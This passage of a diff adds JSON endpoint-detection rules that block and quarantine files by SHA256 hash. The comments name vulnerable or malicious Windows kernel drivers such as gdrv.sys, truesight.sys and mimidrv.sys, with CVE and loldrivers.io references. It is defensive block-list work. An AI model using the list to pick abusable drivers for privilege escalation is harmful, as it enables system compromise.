+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "348679f0f44eb5a50601c48728a5afd2b4312c95eeb7179ce57d447c0d30f873",
+ "comment": "Vulnerable Kernel Driver (aka PanMonFlt.sys) [https://www.loldrivers.io/drivers/cfdc5cb4-be5c-4dcc-a883-825fa72115b4/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8f43ed7c-d3d9-56ab-b38b-19ad94fa9f2e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979864Z",
+ "creation_date": "2026-03-23T11:45:29.979865Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979885Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5c1585b1a1c956c7755429544f3596515dfdf928373620c51b0606a520c6245a",
+ "comment": "Malicious Kernel Driver (aka daxin_blank2.sys) [https://www.loldrivers.io/drivers/2e1531b2-d370-4543-9e2e-5319a1c13c22/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8f446287-ac3d-5d2b-b8c1-d3bf26766a75",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608986Z",
+ "creation_date": "2026-03-23T11:45:29.608988Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608993Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "26c28746e947389856543837aa59a5b1f4697e5721a04d00aa28151a2659b097",
+ "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8f4d3e27-7cff-54e4-a889-2116b86a4a15",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983595Z",
+ "creation_date": "2026-03-23T11:45:29.983597Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983603Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "50f9323eaf7c49cfca5890c6c46d729574d0caca89f7acc9f608c8226f54a975",
+ "comment": "Malicious Kernel Driver (aka ntbios.sys) [https://www.loldrivers.io/drivers/eef1fcf4-8c54-420b-8d38-9c5f95129dcc/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8f505155-6103-5c6d-bd5d-92c4fa4f7d12",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825522Z",
+ "creation_date": "2026-03-23T11:45:30.825524Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825529Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "320ae8c286e987bf73162993087e9ffe1d7d76df3468a6e5bc7dc197b481b00d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8f62ff62-d1f2-5700-8d5a-77941dec1dde",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.463614Z",
+ "creation_date": "2026-03-23T11:45:30.463617Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.463626Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "897f2bbe81fc3b1ae488114b93f3eb0133a85678d061c7a6f718507971f33736",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8f735a58-d1ae-5f3d-8b30-2d72d5b8f047",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145747Z",
+ "creation_date": "2026-03-23T11:45:31.145749Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145754Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "53d919f64c2e4b457b5b5a7b559ec6d9028d9a906adcb600c2b14e186b2e1577",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8f780cee-fb6f-59a0-98fe-068da1f231b5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489162Z",
+ "creation_date": "2026-03-23T11:45:31.489163Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489169Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3ea3f34058bf171564877f8db413350c947c46a962b6b5ee82b400dd0967bcb9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8f83a69a-5739-56d9-bc99-abc22179e75a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144615Z",
+ "creation_date": "2026-03-23T11:45:32.144617Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144622Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0f78dd64abcb5a3e1d60f9e9c92422f34a52e009770e6434d2d8aabb6d370737",
+ "comment": "Vulnerable Kernel Driver (aka RtsUer.sys) [https://www.loldrivers.io/drivers/71d930a7-3465-4d27-90d4-2a1a08bebb92/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8fa07ce7-4c6f-5567-bfa4-f863ceda720a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829759Z",
+ "creation_date": "2026-03-23T11:45:31.829762Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829771Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b04473fe4284519d6eaafdc8a231d6483e91d1532062f37e5b260a6095b4e674",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8fa34d84-033a-50d1-8767-7d4cbb94e0d7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619177Z",
+ "creation_date": "2026-03-23T11:45:29.619179Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619184Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "157ce9ae0d09766cfa3e5be8f90e2ac510f0ce3a0bb7cd97e3a5f9aa20c76661",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8fb0ebb2-ea1a-5219-9d2d-68efee9ae522",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974504Z",
+ "creation_date": "2026-03-23T11:45:29.974506Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974512Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5e71106ee81d050e30afd84cade4ef4a581d70130477aa1e34549e6de50cde87",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8fb16975-bd41-5f87-9f48-c4a96fb1bc20",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611813Z",
+ "creation_date": "2026-03-23T11:45:29.611815Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611820Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "539aa921b5352ab385430e1608ac5c0ae36f35e678d471b7a5994ec7c02eadea",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz141_x64.sys) [CVE-2017-15303] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8fb4cd51-bfdb-5a6b-b2a8-e4f56f5aa0ec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613387Z",
+ "creation_date": "2026-03-23T11:45:29.613389Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613394Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d20d8bf80017e98b6dfc9f6c3960271fa792a908758bef49a390e2692a2a4341",
+ "comment": "ASRock vulnerable drivers - Privilege Escalation (aka AsrDrv10X.sys) [CVE-2018-10709] [https://www.exploit-db.com/exploits/45716] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8fbceaf1-319e-54dc-b64c-711059ba28d8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819760Z",
+ "creation_date": "2026-03-23T11:45:30.819762Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819768Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "29f449fca0a41deccef5b0dccd22af18259222f69ed6389beafe8d5168c59e36",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8fc93f93-b40f-5555-a33a-2afb21d5d19b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460013Z",
+ "creation_date": "2026-03-23T11:45:30.460016Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460024Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "df4e25990742fc8d3aed70f6cb4d402e111e7ed08fa5f76aca685b8c03b98b93",
+ "comment": "Vulnerable Kernel Driver (aka LgDataCatcher.sys) [https://www.loldrivers.io/drivers/5961e133-ccc3-4530-8f4f-5d975c41028d/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8fcc44b8-0249-5c7d-8eab-0d8ac8a65ec5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617059Z",
+ "creation_date": "2026-03-23T11:45:29.617061Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617069Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d259e9b1d04b5fa966094f15f8edbaeba5da2a14bf34bf0a5490a0e308c025d7",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8fcdeac3-d35b-5113-82ce-6887000e1663",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827384Z",
+ "creation_date": "2026-03-23T11:45:31.827386Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827392Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "047e83409fd83837c3566e89079fe840f0f127e2ad77f6a2f6a8ff7b31b4738c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8fdc24c4-dc6a-57b6-a94b-9ffab90ebe04",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980202Z",
+ "creation_date": "2026-03-23T11:45:29.980204Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980210Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "46d1dc89cc5fa327e7adf3e3d6d498657240772b85548c17d2e356aac193dd28",
+ "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8fdd4bd5-7b5b-5a5a-b101-34ac89410b8d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155469Z",
+ "creation_date": "2026-03-23T11:45:31.155471Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155477Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "db5fe428d6e069ab0b6d1c33f654144161526eff5fff076bc503f6e0fa153831",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8fe734a2-d6fe-57c6-9d10-5668dd69435b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489091Z",
+ "creation_date": "2026-03-23T11:45:31.489093Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489099Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "24ef9613e5fe416bfef5c49b18ccfa453ab275353fa59950d578e42b1b00bb20",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8ff8b760-20a0-5fac-8dde-4e0b6b7b3ea2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.461498Z",
+ "creation_date": "2026-03-23T11:45:30.461501Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.461510Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "115034373fc0ec8f75fb075b7a7011b603259ecc0aca271445e559b5404a1406",
+ "comment": "Vulnerable Kernel Driver (aka netfilterdrv.sys) [https://www.loldrivers.io/drivers/f1dcb0e4-aa53-4e62-ab09-fb7b4a356916/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "90048c6b-c146-5408-b210-b399da12293c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142344Z",
+ "creation_date": "2026-03-23T11:45:31.142346Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142351Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0f6e1d4f8e3d0fe8bc2a087f65a4f6fc26b90e98eb2356cd56a7364f9108604d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
